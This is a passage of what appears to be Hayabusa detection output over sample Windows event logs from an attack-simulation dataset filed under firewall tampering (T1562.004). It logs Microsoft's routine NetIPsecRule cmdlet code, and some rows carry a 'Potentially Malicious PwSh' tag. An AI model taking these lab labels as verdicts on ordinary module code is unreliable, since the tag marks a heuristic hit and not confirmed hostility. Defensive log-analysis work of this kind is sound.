$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 